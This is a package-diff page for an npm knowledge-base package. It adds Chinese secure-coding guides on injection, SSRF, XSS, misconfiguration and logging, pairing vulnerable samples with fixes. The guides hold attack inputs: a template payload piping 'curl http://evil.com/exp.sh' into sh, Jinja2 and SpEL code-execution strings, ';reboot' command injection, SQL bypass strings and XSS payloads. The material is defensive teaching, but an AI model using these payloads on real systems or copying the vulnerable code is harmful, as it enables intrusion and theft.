npm - @blueking/bkui-knowledge - Versions diffs - 0.0.1-beta.1 → 0.0.1-beta.10 - Mend

@blueking/bkui-knowledge 0.0.1-beta.1 → 0.0.1-beta.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (50) hide show

package/knowledge/skills/web-security-guide/references/injection.md ADDED Viewed

@@ -0,0 +1,357 @@
+# 注入漏洞（SQL/命令/模板注入/表达式注入等）
+## 1. SQL注入
+### 1.1 漏洞原理
+- SQL注入（SQL Injection） 是指应用程序在构造 SQL 查询语句时，将用户输入直接拼接进 SQL 字符串，攻击者可通过构造恶意输入改变 SQL 执行逻辑，达到绕过认证、窃取数据、篡改删除数据等目的。
+- **本质是**：拼接 + 用户可控输入 + 无转义或参数绑定。
+- 使用ORM并不代表绝对安全，参数绑定和类型校验是第一防线。
+### 1.2 漏洞影响
+- 绕过登录验证：' OR 1=1 --
+- 敏感信息泄露：获取用户、密码、身份证、手机号等
+- 数据篡改/删除：UPDATE user SET admin=1 WHERE id=1
+- 远程命令执行（部分数据库）：使用load_file()、xp_cmdshell等函数
+- 持久化入侵入口：如植入 WebShell 的写入路径
+### 1.3 典型业务场景
+#### 1.3.1 Python项目中的高发点
+##### 1.3.1.1 原生拼接SQL
+- 使用 cursor.execute("select \* from user where id = %s" % uid)
+- 漏洞示例代码如下：
+```python
+# Flask 中直接拼接用户输入
+@app.route("/user")
+def get_user():
+    username = request.args.get("username")
+    sql = f"SELECT * FROM users WHERE username = '{username}'"
+    return db.execute(sql)  # 漏洞点：用户可控 + 拼接
+```
+##### 1.3.1.2 .extra() 接口
+- CVE-2025-4517：Django ORM 的 SQL 扩展接口
+- 漏洞示例代码如下：
+```python
+User.objects.extra(where=["username='%s'" % username])
+```
+##### 1.3.1.3 Q 对象错误使用
+- 字段名或值可控时拼接错误
+##### 1.3.1.4 ORM绕过模型约束
+- .raw()、.execute()使用用户输入
+##### 1.3.1.5 ORM内联字符串
+- Model.objects.filter(name="admin' or 1=1")
+### 1.4 漏洞修复方案
+#### 1.4.1 【必须】参数化查询
+- cursor.execute("SELECT \* FROM user WHERE id = %s", [uid])
+#### 1.4.2 【建议】ORM模型约束
+- 使用 Django ORM 正确方式：User.objects.get(id=uid)
+- 使用 raw 时绑定参数： User.objects.raw("SELECT \* FROM user WHERE username = %s", [uname])
+#### 1.4.3 【建议】白名单限制
+- 字段名、排序字段等应做白名单限制
+#### 1.4.4 【建议】类型强校验
+- int(uid)、re.match(r"^\w+$", username)
+#### 1.4.5 【必须】使用框架提供API
+- ORM语法/QueryBuilder 避免 raw SQL
+---
+## 2. 命令注入
+### 2.1 漏洞原理
+- 命令注入（Command Injection）是指应用程序调用系统命令时，攻击者通过构造恶意参数将系统命令注入执行环境中，最终导致远程命令执行（RCE）。
+- **本质是**：将用户可控参数拼接进 shell 命令、subprocess、os.system 等接口，未做有效校验与隔离，造成攻击者代码被执行。
+- 蓝鲸平台和DevOps场景中，任务下发、脚本执行等均是高风险点，务必提前防御
+### 2.2 漏洞影响
+- 远程命令执行（RCE）：攻击者可执行任意系统命令，如：whoami、curl、bash -i
+- 敏感数据泄露：读取文件 cat /etc/passwd
+- 权限提升：植入提权脚本
+- 横向移动/内网扫描：如利用 ping、curl 对腾讯内网探测
+- 恶意植入：写入WebShell、启动反弹Shell、部署后门
+### 2.3 典型业务场景
+#### 2.3.1 Python项目中的高发点
+##### 2.3.1.1 拼接命令
+- 危险函数：os.system()、os.popen()
+- URL参数传入命令拼接调用
+- 漏洞示例代码如下：
+```python
+import os
+user = request.args.get("user")
+os.system("id " + user)
+```
+##### 2.3.1.2 subprocess shell=True
+- 危险函数：subprocess.call()、check_output()，shell=True 极易出问题
+- 漏洞示例代码如下：
+```python
+import subprocess
+subprocess.call("ls " + filename, shell=True)  # filename=;reboot
+```
+##### 2.3.1.3 调用Job快速命令接口
+```
+cmd=;whoami
+```
+### 2.4 漏洞修复方案
+#### 2.4.1 【必须】禁止使用 shell=True 拼接用户输入
+```python
+# Bad Code: 拼接传入
+subprocess.call("ls " + filename, shell=True)
+```
+```python
+# Good Code: 参数数组传入
+subprocess.run(["ls", filename])
+```
+#### 2.4.2 【必须】白名单校验 + 参数限定
+```python
+def run_safe(cmd):
+    ALLOWED_CMDS = ['ls', 'whoami', 'uptime']
+    if cmd not in ALLOWED_CMDS:
+        abort(403)
+    subprocess.run([cmd])
+```
+#### 2.4.3 【必须】使用 shlex.quote() 防止注入
+```python
+import shlex
+filename = request.args.get("file")
+safe_filename = shlex.quote(filename)
+os.system("cat " + safe_filename)
+```
+#### 2.4.4 【建议】不使用系统命令，可用内建函数替代
+```python
+# Bad Code:
+os.system("ls /tmp")
+```
+```python
+# Good Code:
+import os
+print(os.listdir("/tmp"))
+```
+---
+## 3. 模版注入
+### 3.1 漏洞原理
+- 模板注入漏洞（Template Injection） 是指应用程序将用户输入错误地传入模板引擎（如Jinja2、Mako）进行渲染，攻击者可通过构造特定语法，使模板执行未授权的表达式、访问敏感变量或执行命令，造成敏感数据泄露或远程命令执行。
+- 用户可控的输入被传入 Template().render()、render_template_string()、tpl.render() 等模板接口
+- 模板引擎具备强表达式能力（如支持 `__import__`、.system() 等调用）
+### 3.2 漏洞影响
+- 信息泄露：获取服务端变量、配置、密钥
+- 任意代码执行：利用 `__import__`('os').system() 远程命令执行
+- 横向渗透：读取JWT/Session/内部接口token进一步攻击
+- SSRF：构造请求内部API获取敏感资源
+- 持久化后门：植入恶意模板语句、替换配置文件
+### 3.3 典型业务场景
+#### 3.3.1 Python项目中的高发点
+##### 3.3.1.1 Jinja2模版
+- 有沙箱，默认未开启
+- 支持任意Python对象
+- 漏洞示例代码如下：
+```python
+from flask import Flask, request, render_template_string
+app = Flask(__name__)
+@app.route("/hello")
+def hello():
+    name = request.args.get("name")
+    return render_template_string("Hello {{ " + name + " }}")
+```
+- 用户访问 /hello?name=`__import__`('os').popen('id').read() 将触发命令执行。
+##### 3.3.1.2 Mako模版
+- 无沙箱
+- 可嵌入Python代码块
+- 漏洞示例代码如下：
+```python
+from mako.template import Template
+tpl_string = request.POST.get("tpl")  # 用户可控
+tpl = Template(tpl_string)
+tpl.render(context)
+```
+- 攻击者可以构造恶意模版：
+```shell
+<% import os %>
+<% os.system('curl http://evil.com/exp.sh | sh') %>
+```
+##### 3.3.1.3 Django - Template.render() 使用不当
+- 有沙箱，默认开启
+- 不可执行Python代码块
+- 漏洞示例代码如下：
+```python
+from django.template import Template
+t = Template(user_input)  # 用户可控内容
+t.render(Context({}))
+```
+- 攻击者可通过传入 {{ settings.SECRET_KEY }} 获取服务密钥
+### 3.4 漏洞修复方案
+#### 3.4.1 【必须】永远禁止用户输入作为模板内容渲染
+```python
+tpl = Template("固定模板")  # 模板由系统定义
+tpl.render({"username": safe_input})
+```
+#### 3.4.2 【必须】启用 Jinja2 沙箱环境（SandboxedEnvironment）
+```python
+from jinja2.sandbox import SandboxedEnvironment
+env = SandboxedEnvironment()
+tpl = env.from_string("Welcome {{ username }}")
+tpl.render({"username": clean(user_input)})
+```
+#### 3.4.3 【必须】Mako模板禁用 Python 表达式块
+- 禁止 <%, <%python>, <%! 等标签使用
+- 建议使用字符串格式替代，例如 {{ variable }} 格式映射到预定义变量集合
+#### 3.4.4 【必须】白名单替换机制 + 参数校验
+- 用户只能配置预定义变量，如 {{ hostname }}, {{ alarm_name }}
+- 所有变量替换前进行正则匹配、长度控制、字符黑名单过滤
+---
+## 4. 表达式注入
+### 4.1 漏洞原理
+- 表达式注入是指应用使用 动态表达式语言/引擎（如 Spring EL、OGNL、SpEL、EL、MVEL 等）对外部输入进行拼接或执行时，攻击者通过构造恶意表达式，实现任意方法调用或绕过业务逻辑。
+- 典型原因是 用户输入被直接传递给表达式解析器，且未做过滤/上下文隔离。
+### 4.2 漏洞影响
+- 任意代码执行：攻击者可调用系统类（如 java.lang.Runtime）执行系统命令。
+- 认证绕过：通过伪造条件表达式，绕过鉴权逻辑（如 #{1==1}）。
+- 数据泄露：直接读取系统属性、配置文件或数据库内容。
+- 持久化攻击链：结合 SSRF、文件上传、反序列化，形成复合攻击链。
+### 4.3 典型业务场景
+#### 4.3.1 Java 项目中的高发点
+##### 4.3.1.1 Spring EL（SpEL）
+- 在 SpringMVC 或 Spring Boot 中，使用 @Value、ExpressionParser 或模板渲染时，未限制表达式来源。
+```java
+// Bad Code:
+ExpressionParser parser = new SpelExpressionParser();
+String expr = request.getParameter("expr");   // 用户可控
+Object value = parser.parseExpression(expr).getValue();
+```
+- 攻击者输入：${T(java.lang.Runtime).getRuntime().exec('id')}
+##### 4.3.1.2 OGNL（Struts2 典型）
+- Struts2 的 EL 解析器曾爆发多次 RCE 漏洞（S2-045、S2-057 等），攻击者通过构造 #context['xwork.MethodAccessor.denyMethodExecution']=false 绕过限制。
+##### 4.3.1.3 JSP EL / Thymeleaf
+- JSP 的 ${...} 表达式或 Thymeleaf 模板引擎默认会解析动态对象，若变量可控则可能引入漏洞。
+#### 4.3.2 其他场景
+- MVEL 表达式：部分规则引擎（Drools）使用 MVEL，若表达式从外部输入直接注入则可执行恶意方法。
+- 业务 DSL：企业内部二次封装的"动态计算规则"往往调用底层表达式引擎，缺乏白名单与隔离。
+### 4.4 漏洞修复方案
+#### 4.4.1 【必须】禁止用户输入直接拼接表达式
+- 外部输入不可作为表达式直接传递给解析器。
+```java
+// Good Code:
+String expr = "price * taxRate"; // 来自预定义规则，不是用户输入
+parser.parseExpression(expr).getValue(context);
+```
+#### 4.4.2 【必须】启用安全模式/沙箱
+- 对表达式引擎启用沙箱，禁止访问敏感类（Runtime, System 等）。
+- Spring EL 可通过 StandardEvaluationContext#setPropertyAccessors 定义白名单。
+#### 4.4.3 【必须】白名单机制
+- 仅允许有限的表达式语法或变量（如数学运算、简单函数），拒绝访问任意类/方法。
+```java
+// Good Code: (伪代码)
+if (!expr.matches("^[0-9+\\-*/() ]+$")) {
+    throw new SecurityException("非法表达式");
+}
+```
+#### 4.4.4 【建议】替代方案
+- 业务规则尽量使用 DSL/枚举/条件语句，而非开放的通用表达式解析。
+- 对必须动态化的场景，应进行"编译前静态扫描 + 运行时沙箱"双重防护。

package/knowledge/skills/web-security-guide/references/logging-monitoring.md ADDED Viewed

@@ -0,0 +1,47 @@
+# 日志与监控不足（安全审计缺失）
+## 1. 漏洞原理
+- 日志与监控不足（Inadequate Logging & Monitoring）是指应用系统在设计和实现时，未对 关键安全事件（如登录失败、越权尝试、敏感操作）进行日志记录，或记录不完整，导致无法在攻击发生后快速检测、响应和溯源。
+- 部分系统虽然记录日志，但 日志中包含敏感信息（密码、密钥、Token、身份证号），导致二次泄漏风险。
+- 如果缺少 实时监控与告警，即使日志记录了攻击行为，也可能因为无人关注而错失防御时机。
+## 2. 漏洞影响
+- 攻击无法发现：SQL 注入、XSS、暴力破解等攻击尝试未被记录，导致安全事件长时间潜伏。
+- 取证困难：事后调查时缺乏完整日志，无法还原攻击路径。
+- 敏感数据泄漏：日志中记录明文密码、Token、身份证号等，进一步放大安全风险。
+- 合规风险：未满足合规要求（如 GDPR、等保 2.0、ISO 27001）中的安全审计与追踪要求。
+## 3. 典型业务场景
+### 3.1 登录失败/越权访问无日志记录
+- 攻击者多次尝试弱口令，但系统未记录失败日志，防御人员无法发现暴力破解行为。
+### 3.2 日志中包含敏感数据（密码/Token/身份证号）
+- 开发者在调试时直接输出 user.password 或 Authorization Header，导致日志被攻击者下载后造成二次泄漏。
+### 3.3 未对异常行为做告警（大量请求、暴力破解）
+- API 被异常高频访问，但缺少速率监控与告警，导致业务被拖垮后才发现攻击。
+## 4. 漏洞修复方案
+### 4.1 【必须】所有安全相关事件必须记录日志
+- 包括：登录失败、权限拒绝、关键配置修改、敏感接口调用。
+- 日志内容至少包含：时间、用户标识、请求来源 IP、操作类型、结果。
+### 4.2 【必须】日志必须脱敏处理，禁止敏感数据落盘
+- 明文密码、私钥、身份证号、银行卡号等必须屏蔽或打码（如手机号仅保留后四位）。
+### 4.3 【建议】建立实时告警系统
+- 结合 监控平台（如 ELK、Prometheus、Grafana、Splunk）实时检测异常请求和安全事件。
+### 4.4 【建议】定期对日志审计，检测潜在攻击链
+- 对接 审计中心或蓝鲸监控 系统，实现 安全自动化响应。

package/knowledge/skills/web-security-guide/references/security-config.md ADDED Viewed

@@ -0,0 +1,73 @@
+# 安全配置错误
+## 1. 漏洞原理
+- 安全配置错误（Security Misconfiguration）是指系统、框架、库、应用或云资源在部署和运行过程中，未遵循最小化和安全默认原则，导致攻击者可直接利用弱配置或敏感信息泄露进行攻击。
+- 常见问题：
+  - 开启 debug/verbose 模式，输出内部堆栈和环境变量。
+  - 服务未加鉴权或使用默认口令。
+  - 云存储桶、数据库等对公网开放，无访问控制。
+  - 中间件未关闭目录遍历、未加固 HTTP 头或使用弱 TLS 配置。
+- 本质是：缺乏"安全缺省值"与上线前的基线检查。
+## 2. 漏洞影响
+- 敏感信息泄露：环境变量、堆栈、配置文件、源代码被外部访问。
+- 弱口令攻击：攻击者利用默认口令或弱口令直接接管系统。
+- 数据泄漏：云存储（S3、OSS、COS）、数据库（Mongo、ES、Redis）未加 ACL，造成海量数据泄露。
+- 系统被控：调试/管理接口未关闭，攻击者可远程执行命令或操作系统。
+- 大规模攻击面：一旦暴露在公网，常见的漏洞扫描器、自动化攻击工具即可批量利用。
+## 3. 典型业务场景
+### 3.1 生产环境启用 debug/verbose 模式
+- Flask、Django、Spring Boot 开启 debug，暴露堆栈、环境变量、数据库连接串。
+```python
+# Bad Code:
+# Flask app.py
+app.run(debug=True)  # 开启 debug，生产中高危
+```
+```python
+# Good Code:
+app.run(debug=False)  # 生产必须关闭
+```
+### 3.2 未关闭目录遍历/目录索引
+- Nginx/Apache 默认允许目录索引，攻击者可列出敏感文件，直接显示源码/配置文件。
+### 3.3 默认口令/弱口令未修改
+- ES、Redis、Jenkins、Tomcat 等中间件使用默认口令 admin/admin、root/123456，被爆破成功。
+### 3.4 云存储桶未加 ACL，公开访问
+- AWS S3、阿里云 OSS、腾讯云 COS 桶配置为 public-read，攻击者可直接访问所有存储文件。
+## 4. 漏洞修复方案
+### 4.1 【必须】上线前关闭调试、去除测试接口
+- 生产环境必须禁用 debug/verbose 模式。
+- 确认无 /test、/swagger-ui/、/actuator/ 等未鉴权接口暴露。
+### 4.2 【必须】所有服务组件必须修改默认口令
+- 上线前必须修改默认口令，并配置复杂度策略。
+- 配置身份鉴别（LDAP/OAuth2/Token）。
+### 4.3 【必须】云存储、ES/Redis/Mongo 等禁止公网暴露
+- 服务仅限内网访问，必须配置防火墙/安全组。
+- 云存储桶 ACL 配置为 私有（private），仅业务账号可访问。
+### 4.4 【建议】建立基线配置扫描与合规检查
+- 引入配置扫描工具（如 Lynis、OpenSCAP、Kube-Bench）。
+- 自动化检测弱口令、未加密通信、错误 ACL。
+- 建立合规基线，保证配置随版本升级不回退。

package/knowledge/skills/web-security-guide/references/ssrf.md ADDED Viewed

@@ -0,0 +1,55 @@
+# 服务端请求伪造（SSRF）
+## 1. 漏洞原理
+- SSRF（Server-Side Request Forgery）指攻击者通过精心构造的请求参数，诱使服务端代表其发起请求。
+- 由于服务端通常处于内网环境，攻击者可借此访问 内部系统/云服务元数据/Loopback 接口 等不对外暴露的敏感资源。
+- 本质：服务端未对用户可控的 URL/目标地址进行限制，导致攻击者可以利用服务端作为代理发起恶意请求。
+## 2. 漏洞影响
+- 内网探测：枚举内网端口、存活主机。
+- 敏感信息泄露：访问云环境的元数据接口（如 AWS http://169.254.169.254/ 获取 AK/SK）。
+- 攻击内网应用：绕过防火墙访问仅内网可访问的管理端口（如 Redis、Elasticsearch、K8s API）。
+- 进一步攻击链：结合 Gopher 协议，可构造 Redis/SMTP/MySQL 协议 payload，最终实现 RCE 或数据篡改。
+- 拒绝服务（DoS）：请求大文件/死循环响应，耗尽服务器资源。
+## 3. 典型业务场景
+### 3.1 文件上传接口支持"通过 URL 抓取远程文件"
+- 攻击者传入 http://127.0.0.1:6379/，可直接与内网 Redis 通信。
+### 3.2 Webhook/回调接口，允许用户自定义回调 URL
+- 攻击者设置回调地址为 http://internal-service.local/admin，实现内网横向探测。
+### 3.3 富文本编辑器的"网络图片抓取"功能
+- 用户提交的图片 URL 被服务端下载，可能访问内网敏感地址。
+### 3.4 报表/爬虫接口支持用户输入任意外部 URL
+- 通过 SSRF，攻击者可利用报表功能请求内部资产管理页面或云元数据接口，窃取凭证。
+## 4. 漏洞修复方案
+### 4.1 【必须】对目标 URL 做白名单校验，仅允许业务可信域名
+- 例如仅允许 cdn.qq.com、static.tencent.com 等业务域。
+### 4.2 【必须】禁止访问内网/环回/链路本地地址
+- 拦截 127.0.0.1/8、10.0.0.0/8、172.16.0.0/12、192.168.0.0/16、169.254.0.0/16 等网段。
+### 4.3 【必须】禁止危险协议
+- 禁止 file://、gopher://、ftp:// 等高危协议，仅允许 http/https。
+### 4.4 【建议】通过服务端代理统一转发请求
+- 在代理层做 ACL、审计、超时/限速控制，避免业务服务直接对外请求。
+### 4.5 【建议】对下载响应内容大小/时间做限制
+- 设置最大响应体积（如 10MB）、请求超时（如 3s），防止攻击者利用大文件/死链 DoS。

package/knowledge/skills/web-security-guide/references/xss.md ADDED Viewed

@@ -0,0 +1,134 @@
+# XSS（跨站脚本攻击）
+## 1. 漏洞原理
+- XSS（Cross-Site Scripting） 是指攻击者将恶意脚本注入到网页中，当其他用户访问该网页时，恶意脚本在其浏览器中执行，从而窃取用户信息、劫持账号或控制浏览器。
+- **本质是**：用户输入 -> 未转义输出 -> 浏览器执行脚本。
+## 2. 漏洞影响
+- 会话劫持：获取 document.cookie，冒用用户身份
+- 页面伪造：嵌入钓鱼表单，诱导用户操作
+- 权限滥用：使用 JS 执行接口请求，冒用用户操作（CSRF + XSS 联合攻击）
+- 木马注入：植入脚本实现远程控制、广告弹窗、挖矿脚本等
+- 数据篡改：修改页面结构，引导转账、误导点击等
+## 3. 典型业务场景
+### 3.1 【反射型 XSS】URL/表单参数未过滤即输出
+- 原理：攻击者构造 URL，诱导用户点击，恶意代码随参数被反射到页面并执行。
+- 特点：代码不落地，不存储，仅当前响应携带。
+- 漏洞示例代码如下：
+```python
+from flask import Flask, request, render_template_string
+app = Flask(__name__)
+@app.route('/greet')
+def greet():
+    name = request.args.get("name")
+    return render_template_string("Hello %s" % name)
+```
+- 访问 URL：`/greet?name=<script>alert(1)</script>`
+### 3.2 【存储型 XSS】恶意脚本被写入数据库并展示
+- 原理：攻击者提交评论、工单内容等含 JS 的文本，系统将其存入数据库并在前端原样输出。
+- 特点：影响持续存在，攻击范围广，可批量感染用户。
+- 漏洞示例代码如下：
+```python
+# 假设以下是评论展示逻辑
+@app.route("/comment/<int:id>")
+def show_comment(id):
+    content = db.get_comment(id)  # 数据库中含 <script> 标签
+    return render_template("comment.html", content=content)
+```
+- 若 content 来自用户输入，且未转义
+```html
+<!-- HTML 模板（Jinja2） -->
+{{ content }}
+```
+### 3.3 【DOM 型 XSS】JavaScript中操作DOM时拼接用户输入
+- 原理：客户端 JavaScript 使用 innerHTML、document.write() 等方式拼接不可信输入，导致脚本执行。
+- 特点：漏洞存在于前端代码，绕过后端防御。
+- 漏洞示例代码如下：
+```javascript
+<!-- 不可信输入拼接到 innerHTML 中 -->
+<script>
+  const param = new URLSearchParams(location.search).get('msg');
+  document.getElementById("result").innerHTML = param;
+</script>
+```
+- 访问：`http://example.com/?msg=<img src=1 onerror=alert(1)>`
+### 3.4 【混合型 XSS】后端输出配合前端执行形成复合攻击
+- 原理：后端将可控输入存入响应，前端再将该值通过 DOM 操作执行，形成复合型 XSS。
+- 特点：攻击链复杂，漏洞位置跨层。
+- 漏洞示例代码如下：
+```javascript
+<!-- 后端输出：<input id="msg" value="{{ user_input }}" hidden> -->
+<!-- 前端JS拼接未清洗的input值 -->
+<script>
+  const msg = document.getElementById("msg").value;
+  document.getElementById("box").innerHTML = msg;
+</script>
+```
+- 攻击者输入字段：`"><img src=1 onerror=alert(1)>`
+## 4. 漏洞修复方案
+### 4.1 【必须】使用 CSP（内容安全策略）
+- 限制页面只能加载自身 JS，禁止外链与内联脚本：
+```
+Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'
+```
+### 4.2 【必须】后端模板引擎开启自动转义
+- Flask（Jinja2）：默认开启，不要使用 |safe
+- Django：默认开启，严禁对用户输入使用 |safe
+### 4.3 【必须】所有输入内容严格做 XSS 过滤（非转义）
+```python
+from markupsafe import escape
+html = escape(user_input)
+```
+### 4.4 【必须】严禁前端 innerHTML 拼接用户输入
+```javascript
+// Bad Code:
+document.getElementById("box").innerHTML = location.search.slice(1);
+```
+```javascript
+// Good Code:
+document.getElementById("box").textContent = location.search.slice(1);
+```
+### 4.5 【必须】禁止在模板中使用 |safe 修饰用户可控字段
+- 禁止使用：{{ user_input|safe }}
+### 4.6 【建议】启用 HttpOnly cookie
+- 避免 JS 读取 cookie
+### 4.7 【建议】启用 SameSite=Strict
+- 防止 XSS 联合 CSRF

package/package.json CHANGED Viewed

@@ -1,7 +1,7 @@
 {
   "name": "@blueking/bkui-knowledge",
-  "version": "0.0.1-beta.1",
-  "description": "蓝鲸前端知识库 MCP 服务 - 自动同步 skills，支持 Cursor/VSCode",
+  "version": "0.0.1-beta.10",
+  "description": "蓝鲸前端知识库 MCP 服务 - 自动同步 skills，支持 Cursor/CodeBuddy",
   "main": "server/mcp-core.js",
   "bin": {
     "bkui-knowledge": "./bin/bkui-knowledge.js"
@@ -20,7 +20,7 @@
   "repository": {
     "type": "git"
   },
-  "keywords": ["mcp", "cursor", "ai", "knowledge-base", "bkui", "vue3"],
+  "keywords": ["mcp", "cursor", "codebuddy", "ai", "knowledge-base", "bkui", "vue3"],
   "author": "ielgnaw",
   "license": "ISC"
 }